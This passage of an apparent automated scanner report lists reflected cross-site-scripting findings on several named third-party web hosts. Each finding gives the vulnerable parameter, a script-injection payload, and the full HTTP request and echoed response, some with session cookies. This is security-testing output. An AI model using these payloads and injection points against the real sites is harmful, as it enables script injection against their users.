Referer: http://yahoo.match.com/search/searchSubmit.aspx?by=radius&lid=226&cl=1&gc=1&tr=2&lage=25&uage=35&ua=35&dist=20&po=1&oln=0&do=2&q=man,women,25,35&st=quicksearch&pn=1&rn=4
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.151 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: dMatch=CCount=1&CDate=3/22/2011; __utmz=191932533.1300827941.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); ppLoginReferer=http%3a%2f%2fyahoo.match.com%2fLogin%2fLinkedAccountsPassportReturn.aspx; dMatchSearchROF=ROF01=&ROF05=&ROF02=&ROF04=&ROF03=United States&ROF06=; dMatchSearch=SC01=1&SC02=2&SC07=&SC08=&SC04=35&SC13=0&SC14=0&SC09=1&SC12=region; __utma=191932533.1516891893.1300827941.1300827941.1300827941.1; __utmc=191932533; __utmb=191932533.10.10.1300827941

Response

HTTP/1.1 200 OK
Date: Tue, 22 Mar 2011 21:34:09 GMT
Server: Apache/1.3.37 (Unix)
Cache-Control: no-cache, must-revalidate
Expires: Tue, 1 Jan 1970 01:01:01 GMT
Pragma: no-cache
P3P: policyref="http://media.match.com/p3p.xml", CP="BUS COM COR DEVa DSP NAV NOI OUR PRE STA TAIa UNI"
Set-Cookie: PrefID=11-612908996; expires=Mon, 22 Mar 2021 09:34:09 GMT; path=/; domain=.match.com
Set-Cookie: CSList=1088050/1083487,0/0,0/0,0/0,0/0; expires=Mon, 20 Jun 2011 21:34:09 GMT; path=/; domain=.match.com
Content-Type: text/html
Content-Length: 783
Connection: close

<HTML>
<HEAD>
<META HTTP-EQUIV="Pragma" CONTENT="no-cache">
</HEAD>
<BODY>
<A HREF="http://media.match.com/click.ng?spacedesc=2121888_1083487_728x90_1226306_2121888&af=1110302&ml_pkgkw=-%253A%25
...[SNIP]...
6/40730653/1%3B%3B%7Eaopt%3D2/0/3e00ff/0%3B%7Esscs%3D%3fhttp://www.match.com/brands/chemistry.aspx?s=5&TrackingID=2000955&sourceid=1088050_1083487_1226306_2121888_1110302_2121933_728x90" TARGET="_blank4837c"><script>alert(1)</script>6569d8e2df9">
...[SNIP]...

1.212. http://metaframe.digitalsmiths.tv/v1/tmzcompany/playlists/mostrecent [REST URL parameter 1]

Summary

Severity:   High
Confidence:   Certain
Host:   http://metaframe.digitalsmiths.tv
Path:   /v1/tmzcompany/playlists/mostrecent

Issue detail

The value of REST URL parameter 1 is copied into an HTML comment. The payload bcb4a--><script>alert(1)</script>426bfcbe534 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /v1bcb4a--><script>alert(1)</script>426bfcbe534/tmzcompany/playlists/mostrecent?format=json HTTP/1.1
Host: metaframe.digitalsmiths.tv
Proxy-Connection: keep-alive
Referer: http://tmz.vo.llnwd.net/o28/player/rightrail/playlist.swf
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.151 Safari/534.16
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 404 Not Found
Server: nginx/0.7.65
Content-Type: text/html
X-Varnish: 579499436
Vary: Accept-Encoding
Cache-Control: max-age=5
Date: Tue, 22 Mar 2011 22:05:44 GMT
Connection: close
Content-Length: 729

<html>
<head><title>Not Found</title></head>
<body>
<h1>Not Found</h1>
<p>The resource could not be found.
<br/>/v1bcb4a--&gt;&lt;script&gt;alert(1)&lt;/script&gt;426bfcbe534/tmzcompa
...[SNIP]...
,
(None, '/v1/extratvcompany'),
(None, '/v1/judgejpcompany'),
(None, '/v1/ellencompany'),
(None, '/v1/lopeztonight'),
(None, '/v1/tmzcompany'),
(None, '/v2')
SCRIPT_NAME: ''
PATH_INFO: '/v1bcb4a--><script>alert(1)</script>426bfcbe534/tmzcompany/playlists/mostrecent'
HTTP_HOST: 'mds_paste' -->
...[SNIP]...

1.213. http://metaframe.digitalsmiths.tv/v1/tmzcompany/playlists/mostrecent [REST URL parameter 2]

Summary

Severity:   High
Confidence:   Certain
Host:   http://metaframe.digitalsmiths.tv
Path:   /v1/tmzcompany/playlists/mostrecent

Issue detail

The value of REST URL parameter 2 is copied into an HTML comment. The payload b47ef--><script>alert(1)</script>979a162cabe was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /v1/tmzcompanyb47ef--><script>alert(1)</script>979a162cabe/playlists/mostrecent?format=json HTTP/1.1
Host: metaframe.digitalsmiths.tv
Proxy-Connection: keep-alive
Referer: http://tmz.vo.llnwd.net/o28/player/rightrail/playlist.swf
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.151 Safari/534.16
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 404 Not Found
Server: nginx/0.7.65
Content-Type: text/html
X-Varnish: 579499442
Vary: Accept-Encoding
Cache-Control: max-age=5
Date: Tue, 22 Mar 2011 22:05:45 GMT
Connection: close
Content-Length: 729

<html>
<head><title>Not Found</title></head>
<body>
<h1>Not Found</h1>
<p>The resource could not be found.
<br/>/v1/tmzcompanyb47ef--&gt;&lt;script&gt;alert(1)&lt;/script&gt;979a162ca
...[SNIP]...
'/v1/extratvcompany'),
(None, '/v1/judgejpcompany'),
(None, '/v1/ellencompany'),
(None, '/v1/lopeztonight'),
(None, '/v1/tmzcompany'),
(None, '/v2')
SCRIPT_NAME: ''
PATH_INFO: '/v1/tmzcompanyb47ef--><script>alert(1)</script>979a162cabe/playlists/mostrecent'
HTTP_HOST: 'mds_paste' -->
...[SNIP]...

1.214. http://metaframe.digitalsmiths.tv/v1/tmzcompany/playlists/mostrecent [format parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://metaframe.digitalsmiths.tv
Path:   /v1/tmzcompany/playlists/mostrecent

Issue detail

The value of the format request parameter is copied into the HTML document as plain text between tags. The payload fa94c<script>alert(1)</script>c7216a771a6 was submitted in the format parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /v1/tmzcompany/playlists/mostrecent?format=jsonfa94c<script>alert(1)</script>c7216a771a6 HTTP/1.1
Host: metaframe.digitalsmiths.tv
Proxy-Connection: keep-alive
Referer: http://tmz.vo.llnwd.net/o28/player/rightrail/playlist.swf
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.151 Safari/534.16
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 400 Bad Request
Server: nginx/0.7.65
Content-Type: text/html
Content-Length: 58
X-Varnish: 579499431
Vary: Accept-Encoding
Cache-Control: max-age=5
Date: Tue, 22 Mar 2011 22:05:43 GMT
Connection: close

bad format : jsonfa94c<script>alert(1)</script>c7216a771a6

1.215. http://pixel.invitemedia.com/admeld_sync [admeld_callback parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://pixel.invitemedia.com
Path:   /admeld_sync

Issue detail

The value of the admeld_callback request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload f8172'%3balert(1)//8e55f5a4205 was submitted in the admeld_callback parameter. This input was echoed as f8172';alert(1)//8e55f5a4205 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /admeld_sync?admeld_user_id=63e2c778-f3e1-4d02-8ee2-261dfa64843d&admeld_adprovider_id=300&admeld_call_type=js&admeld_callback=http://tag.admeld.com/matchf8172'%3balert(1)//8e55f5a4205 HTTP/1.1
Host: pixel.invitemedia.com
Proxy-Connection: keep-alive
Referer: http://www.tmz.com/
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.151 Safari/534.16
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: uid=002d9af2-d1e0-46f3-a4d5-a4e3b437adec; partnerUID=eyIxOTkiOiBbIkE5NkM3OEUwNDA1NzQ0Qzc4MDYyMTNENTczNTFBMTA0IiwgdHJ1ZV0sICI3OSI6IFsiNGRlMzBhNTAwYzhjNmI4YmY5Y2JhNzU5OTUwNWI1MjkiLCB0cnVlXSwgIjg0IjogWyJkcHZIRUh6OTk5ZWZJUG9CIiwgdHJ1ZV19; exchange_uid=eyIyIjogWyI0NDcwNDU1NTczMjUzOTA1MzQwIiwgNzM0MjE1XSwgIjQiOiBbIkNBRVNFUG9xYnJjUXIxTjBuR1NrM2x0SlNOOCIsIDczNDE4OF19; segments_p1="eJzjYuY4msPFzLFYCUjM8eNi4Vi7jRHIfCwFZD7vBzH/hQOZvceZgMwNVkDmodWMQPLTNiYg+eIASEWbKZA4ycHFxMHBxcXxYAqzQNPBbW9ZgIK3vUGK2kCKGiOAxDmQXadzgIKPJ4BMebwWZMqCySD2wU0gdh/YounGQIPuAQ1aPmUP2KATID2rJjADhf/2MQuc/7QAYn4lUODDFiaB99fnv2EBKpmxHWTIy4MgAxvfguzdyMHFyXGuSmD142awltl+QOK/D8hjHEBFG8Ea7nWCTP64jUng37TLYINa9zICAMRBTrs="; subID="{}"; impressions="{\"482972\": [1299945155+ \"6ef01ee1-d0cb-3382-9a63-cbfcfe5aab57\"+ 142729+ 86413+ 46]+ \"520622\": [1300725653+ \"TYd_lAADC0AK7FQNrXECjw==\"+ 119539+ 65206+ 1881]+ \"53031\": [1300641748+ \"75748d8d-6597-35f3-881e-7777a5e6e3f4\"+ 44623+ 18287+ 171]+ \"53032\": [1300642147+ \"6f4869ac-89fa-3cf7-8417-2a63c2810131\"+ 44253+ 18150+ 77]+ \"53033\": [1300642204+ \"31737625-e066-390a-9d0e-19cbc315801f\"+ 44620+ 18287+ 171]+ \"430436\": [1298206796+ \"TWEQSwABRq4K5X4e_EJrqQ==\"+ 78868+ 35674+ 1731]}"; camp_freq_p1="eJzjEuHovMEiwCgx9f/cNywGjBZgmkuaY4GHAIvEnM8z3rAosGhcmTQPKMliceU9kM8lwtG6HqTl8Np3r1kUGDQYDBgsGICiz78zA0XPLGhBiAIAQGMe8g=="; io_freq_p1="eJzjEubY6S/AKDH1/9w3LAaMFmCaS5zjoogAi8SczzPesCgwaDAYsFhceQ9kcwlzXPcGqj689t1riASDBQNQ8JIbUPDMghaEIAALAhq0"; dp_rec="{\"2\": 1300725653}"

Response

HTTP/1.0 200 OK
Server: IM BidManager
Date: Tue, 22 Mar 2011 22:03:26 GMT
P3P: policyref="/w3c/p3p.xml", CP="OTI DSP COR ADMo TAIo PSAo PSDo CONo OUR SAMo OTRo STP UNI PUR COM NAV INT DEM STA PRE LOC"
Expires: Tue, 22-Mar-2011 22:03:06 GMT
Content-Type: text/javascript
Pragma: no-cache
Cache-Control: no-cache
Content-Length: 569

document.write('<img width="0" height="0" src="http://tag.admeld.com/matchf8172';alert(1)//8e55f5a4205?admeld_adprovider_id=300&external_user_id=002d9af2-d1e0-46f3-a4d5-a4e3b437adec&Expiration=1301263406&custom_user_segments=%2C11265%2C24197%2C6790%2C30337%2C8%2C41869%2C41870%2C15579%2C6551%2C39832%2C1
...[SNIP]...

1.216. http://publisher.mediapass.com/AffiliateID.aspx [Name parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://publisher.mediapass.com
Path:   /AffiliateID.aspx

Issue detail

The value of the Name request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 176f3'%3balert(1)//95d37419c8b was submitted in the Name parameter. This input was echoed as 176f3';alert(1)//95d37419c8b in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /AffiliateID.aspx?Name=AffiliateID176f3'%3balert(1)//95d37419c8b HTTP/1.1
Host: publisher.mediapass.com
Proxy-Connection: keep-alive
Referer: http://publisher.mediapass.com/join.aspx
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.151 Safari/534.16
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __utmz=152699238.1300485317.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); ASP.NET_SessionId=hnh5hq55wwkisr45yfmircm3; __utma=152699238.1375779235.1300485317.1300485317.1300907296.2; __utmc=152699238; __utmb=152699238.4.10.1300907296

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Length: 97
Content-Type: application/x-javascript; charset=utf-8
Server: Microsoft-IIS/7.0
X-AspNet-Version: 2.0.50727
P3P: CP="NOI DSP COR NID ADMa OPTa OUR NOR"
X-Powered-By: ASP.NET
Date: Wed, 23 Mar 2011 19:11:40 GMT

document.write('<input type="hidden" name="AffiliateID176f3';alert(1)//95d37419c8b" value="">');

1.217. http://r.turn.com/server/pixel.htm [fpid parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://r.turn.com
Path:   /server/pixel.htm

Issue detail

The value of the fpid request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload d2946"><script>alert(1)</script>43672c3b592 was submitted in the fpid parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /server/pixel.htm?fpid=d2946"><script>alert(1)</script>43672c3b592&sp=y&admeld_call_type=iframe&admeld_user_id=63e2c778-f3e1-4d02-8ee2-261dfa64843d&admeld_adprovider_id=24&admeld_call_type=iframe&admeld_callback=http://tag.admeld.com/match HTTP/1.1
Host: r.turn.com
Proxy-Connection: keep-alive
Referer: http://www.tmz.com/
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.151 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Server: Apache-Coyote/1.1
P3P: policyref="http://ad.turn.com/w3c/p3p.xml", CP="NOI CURa DEVa TAIa PSAa PSDa IVAa IVDa OUR IND UNI NAV"
Cache-Control: max-age=0, no-cache, no-store, private, must-revalidate, s-maxage=0
Pragma: no-cache
Set-Cookie: uid=8392341830659049202; Domain=.turn.com; Expires=Sun, 18-Sep-2011 22:03:40 GMT; Path=/
Content-Type: text/html;charset=UTF-8
Vary: Accept-Encoding
Date: Tue, 22 Mar 2011 22:03:40 GMT
Content-Length: 377

<html>
<head>
</head>
<body>
<iframe name="turn_sync_frame" width="0" height="0" frameborder="0"
   src="http://cdn.turn.com/server/ddc.htm?uid=8392341830659049202&rnd=3925093810491620252&fpid=d2946"><script>alert(1)</script>43672c3b592&nu=n&t=&sp=y&purl="
   marginwidth="0" marginheight="0" vspace="0" hspace="0" allowtransparency="true"
   scrolling="no">
...[SNIP]...

1.218. http://r.turn.com/server/pixel.htm [sp parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://r.turn.com
Path:   /server/pixel.htm

Issue detail

The value of the sp request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 34084"><script>alert(1)</script>890b9545dd4 was submitted in the sp parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /server/pixel.htm?fpid=4&sp=34084"><script>alert(1)</script>890b9545dd4&admeld_call_type=iframe&admeld_user_id=63e2c778-f3e1-4d02-8ee2-261dfa64843d&admeld_adprovider_id=24&admeld_call_type=iframe&admeld_callback=http://tag.admeld.com/match HTTP/1.1
Host: r.turn.com
Proxy-Connection: keep-alive
Referer: http://www.tmz.com/
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.151 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Server: Apache-Coyote/1.1
P3P: policyref="http://ad.turn.com/w3c/p3p.xml", CP="NOI CURa DEVa TAIa PSAa PSDa IVAa IVDa OUR IND UNI NAV"
Cache-Control: max-age=0, no-cache, no-store, private, must-revalidate, s-maxage=0
Pragma: no-cache
Set-Cookie: uid=8392341830659049202; Domain=.turn.com; Expires=Sun, 18-Sep-2011 22:03:42 GMT; Path=/
Content-Type: text/html;charset=UTF-8
Vary: Accept-Encoding
Date: Tue, 22 Mar 2011 22:03:42 GMT
Content-Length: 377

<html>
<head>
</head>
<body>
<iframe name="turn_sync_frame" width="0" height="0" frameborder="0"
   src="http://cdn.turn.com/server/ddc.htm?uid=8392341830659049202&rnd=3573749032740515380&fpid=4&nu=n&t=&sp=34084"><script>alert(1)</script>890b9545dd4&purl="
   marginwidth="0" marginheight="0" vspace="0" hspace="0" allowtransparency="true"
   scrolling="no">
...[SNIP]...

1.219. https://secure.coolhandle.com/cart.php [domainoption parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   https://secure.coolhandle.com
Path:   /cart.php

Issue detail

The value of the domainoption request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload fc594'%3balert(1)//d6576d9822c20d453 was submitted in the domainoption parameter. This input was echoed as fc594';alert(1)//d6576d9822c20d453 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

The original request used the POST method; however, it was possible to convert it to a GET request, which makes the attack easier to demonstrate and deliver.

Request

GET /cart.php?a=add&pid=9997177&o=billingcycle&billingcycle=monthly&domainoption=owndomainfc594'%3balert(1)//d6576d9822c20d453&sld%5B0%5D=&tld%5B0%5D=.com&sld%5B1%5D=&tld%5B1%5D=.com&sld%5B2%5D=&tld%5B2%5D=&sld%5B3%5D=&x=68&y=1 HTTP/1.1
Host: secure.coolhandle.com
Connection: keep-alive
Referer: https://secure.coolhandle.com/cart.php?a=add&pid=9997177
Cache-Control: max-age=0
Origin: https://secure.coolhandle.com
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.151 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __cfduid=d20394667c3c8a4138507d234177080ae1300907582; __utmz=143175079.1300907637.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=143175079.1962694896.1300907637.1300907637.1300907637.1; __utmc=143175079; __utmb=143175079.5.10.1300907637; PHPSESSID=92fd1669a5fdf217a1316416894dbbad

Response

HTTP/1.1 200 OK
Date: Wed, 23 Mar 2011 19:15:01 GMT
Server: Apache/2.2.10 (Unix) mod_ssl/2.2.10 OpenSSL/0.9.8e-fips-rhel5 mod_bwlimited/1.4 PHP/5.2.5
X-Powered-By: PHP/5.2.5
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: private
Pragma: no-cache
Keep-Alive: timeout=5, max=100
Connection: Keep-Alive
Content-Type: text/html; charset=iso-8859-1
Content-Length: 8772


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head profile="http://gmpg.org/x
...[SNIP]...
mentById('transfer').style.display='none';
document.getElementById('owndomain').style.display='none';
document.getElementById('subdomain').style.display='none';
document.getElementById('selowndomainfc594';alert(1)//d6576d9822c20d453').checked='true';
document.getElementById('owndomainfc594';alert(1)//d6576d9822c20d453').style.display='';
</script>
...[SNIP]...

1.220. https://secure.coolhandle.com/other/contactform_orderform.php [name of an arbitrarily supplied request parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   https://secure.coolhandle.com
Path:   /other/contactform_orderform.php

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 2a8dc"><script>alert(1)</script>33e6208caae was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /other/contactform_orderform.php/2a8dc"><script>alert(1)</script>33e6208caae HTTP/1.1
Host: secure.coolhandle.com
Connection: keep-alive
Referer: https://secure.coolhandle.com/cart.php?a=add&pid=9997177
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.151 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __cfduid=d20394667c3c8a4138507d234177080ae1300907582; __utmz=143175079.1300907637.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=143175079.1962694896.1300907637.1300907637.1300907637.1; __utmc=143175079; __utmb=143175079.5.10.1300907637; PHPSESSID=92fd1669a5fdf217a1316416894dbbad

Response

HTTP/1.1 200 OK
Date: Wed, 23 Mar 2011 19:14:23 GMT
Server: Apache/2.2.10 (Unix) mod_ssl/2.2.10 OpenSSL/0.9.8e-fips-rhel5 mod_bwlimited/1.4 PHP/5.2.5
X-Powered-By: PHP/5.2.5
Content-Length: 2984
Keep-Alive: timeout=5, max=100
Connection: Keep-Alive
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head profile="http://gmpg.org/xfn
...[SNIP]...
<form method="POST" action="/other/contactform_orderform.php/2a8dc"><script>alert(1)</script>33e6208caae">
...[SNIP]...

1.221. http://tag.contextweb.com/TagPublish/getjs.aspx [action parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://tag.contextweb.com
Path:   /TagPublish/getjs.aspx

Issue detail

The value of the action request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload a852e"%3balert(1)//cecb5ae80be was submitted in the action parameter. This input was echoed as a852e";alert(1)//cecb5ae80be in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /TagPublish/getjs.aspx?action=VIEWADa852e"%3balert(1)//cecb5ae80be&cwrun=200&cwadformat=300X250&cwpid=529848&cwwidth=300&cwheight=250&cwpnet=1&cwtagid=88083 HTTP/1.1
Host: tag.contextweb.com
Proxy-Connection: keep-alive
Referer: http://www.tmz.com/tips
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.151 Safari/534.16
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: CDSActionTracking6=rxYjeHcW6ZVB|GlchrMbA1MSR|516071|749|4426|42222|73391|56858|2|254|16|boston.com|2|8|1|0|2|1|2|DOTM5.CMST1.LOW21|1|1|0NHN21JG2RctrhRJEMBk_2cpxPqNqF8XjX2-c1AKWVc^|I|2qVT9|2BObB; cr=141|1|-8589018238111413015|1; FC1-WC=^54463_2_2v0tA; __utmz=57563192.1300142889.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); _jsuid=9731344706080960861; __utma=57563192.1578638003.1300142889.1300142889.1300142889.1; V=GlchrMbA1MSR; cwbh1=2837%3B03%2F23%2F2011%3BRCQU1%3B03%2F28%2F2011%3BRCQU9%0A357%3B03%2F25%2F2011%3BEMON1%3B03%2F30%2F2011%3BEHEX1%0A2532%3B03%2F28%2F2011%3BAMQU1%0A1931%3B04%2F16%2F2011%3BFE479%3B04%2F06%2F2011%3BFE311%3B04%2F02%2F2011%3BFE655%0A996%3B04%2F05%2F2011%3BFACO1%0A2452%3B04%2F21%2F2011%3BTMHS1%0A749%3B04%2F03%2F2011%3BDOT23%0A2866%3B04%2F04%2F2011%3BSHME2%0A2863%3B04%2F20%2F2011%3BITUT5

Response

HTTP/1.1 200 OK
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
P3P: policyref="/w3c/p3p.xml", CP="NOI DSP COR NID CURa DEVa PSAa OUR BUS COM NAV INT"
CW-Server: CW-WEB29
Cache-Control: public, must-revalidate, max-age=0
Last-Modified: Tue, 01 Feb 2011 18:17:28 GMT
ETag: -1561381710
Content-Type: application/x-javascript; charset=utf-8
Content-Length: 5704
P3P: policyref="/w3c/p3p.xml", CP="NOI DSP COR NID CURa DEVa PSAa OUR BUS COM NAV INT"
Date: Tue, 22 Mar 2011 22:04:04 GMT
Connection: close
Set-Cookie: cw=cw; domain=.contextweb.com; path=/

function cw_Process(){try{var cu="http://tag.contextweb.com/TAGPUBLISH/getad.aspx";var cp="529848";var ct="88083";var cf="300X250";var ca="VIEWADa852e";alert(1)//cecb5ae80be";var cr="200";var cw="300";var ch="250";var cn="1";var cads="0";String.prototype.cwcontains=function(s){return(this.toLowerCase().indexOf(s.toLowerCase())!= -1);};var _nxy=[-1,-1];var _cwd=document;va
...[SNIP]...

1.222. http://tag.contextweb.com/TagPublish/getjs.aspx [cwadformat parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://tag.contextweb.com
Path:   /TagPublish/getjs.aspx

Issue detail

The value of the cwadformat request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 9cbfc"%3balert(1)//0e17effbbec was submitted in the cwadformat parameter. This input was echoed as 9cbfc";alert(1)//0e17effbbec in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /TagPublish/getjs.aspx?action=VIEWAD&cwrun=200&cwadformat=300X2509cbfc"%3balert(1)//0e17effbbec&cwpid=529848&cwwidth=300&cwheight=250&cwpnet=1&cwtagid=88083 HTTP/1.1
Host: tag.contextweb.com
Proxy-Connection: keep-alive
Referer: http://www.tmz.com/tips
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.151 Safari/534.16
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: CDSActionTracking6=rxYjeHcW6ZVB|GlchrMbA1MSR|516071|749|4426|42222|73391|56858|2|254|16|boston.com|2|8|1|0|2|1|2|DOTM5.CMST1.LOW21|1|1|0NHN21JG2RctrhRJEMBk_2cpxPqNqF8XjX2-c1AKWVc^|I|2qVT9|2BObB; cr=141|1|-8589018238111413015|1; FC1-WC=^54463_2_2v0tA; __utmz=57563192.1300142889.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); _jsuid=9731344706080960861; __utma=57563192.1578638003.1300142889.1300142889.1300142889.1; V=GlchrMbA1MSR; cwbh1=2837%3B03%2F23%2F2011%3BRCQU1%3B03%2F28%2F2011%3BRCQU9%0A357%3B03%2F25%2F2011%3BEMON1%3B03%2F30%2F2011%3BEHEX1%0A2532%3B03%2F28%2F2011%3BAMQU1%0A1931%3B04%2F16%2F2011%3BFE479%3B04%2F06%2F2011%3BFE311%3B04%2F02%2F2011%3BFE655%0A996%3B04%2F05%2F2011%3BFACO1%0A2452%3B04%2F21%2F2011%3BTMHS1%0A749%3B04%2F03%2F2011%3BDOT23%0A2866%3B04%2F04%2F2011%3BSHME2%0A2863%3B04%2F20%2F2011%3BITUT5

Response

HTTP/1.1 200 OK
Server: Microsoft-IIS/6.0
P3P: policyref="/w3c/p3p.xml", CP="NOI DSP COR NID CURa DEVa PSAa OUR BUS COM NAV INT"
X-Powered-By: ASP.NET
CW-Server: CW-WEB21
Cache-Control: public, must-revalidate, max-age=0
Last-Modified: Tue, 01 Feb 2011 18:17:28 GMT
ETag: 657184314
Content-Type: application/x-javascript; charset=utf-8
Content-Length: 5704
P3P: policyref="/w3c/p3p.xml", CP="NOI DSP COR NID CURa DEVa PSAa OUR BUS COM NAV INT"
Date: Tue, 22 Mar 2011 22:04:04 GMT
Connection: close
Set-Cookie: cw=cw; domain=.contextweb.com; path=/

